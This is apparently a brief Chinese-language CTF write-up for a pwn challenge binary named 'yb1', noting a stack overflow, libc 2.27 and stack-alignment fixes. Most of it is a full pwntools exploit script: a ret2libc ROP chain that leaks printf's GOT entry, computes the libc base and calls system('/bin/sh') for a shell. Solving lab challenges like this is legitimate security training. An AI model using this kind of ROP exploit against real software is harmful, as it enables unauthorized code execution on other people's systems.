显然就是一个简单的栈溢出,但是问题是还是不知道libc。
试了半天libc是2.27的,但是2.27的ibc又会有一个栈对齐的问题。
调试调试给它对齐就行。
有好几处需要栈对齐。
exp
from pwn import*
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
r = process("yb1")
elf = ELF("./yb1")
libc = ELF("./64/libc-2.27.so")
pop_rdi = 0x400703
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = 0x4005f7
ret_addr = 0x400690
payload = "a" * 40 + p64(ret_addr) + p64(pop_rdi) + p64(printf_got) + p64(printf_plt) + p64(ret_addr) + p64(main_addr)
r.sendlineafter("What's your name? ",payload)
libc_base = u64(r.recvuntil("\x7f")[-6:] + '\x00\x00') - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search("/bin/sh").next()
payload = 'a' * 40 + p64(ret_addr) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
r.sendlineafter("What's your name? ",payload)
r.interactive()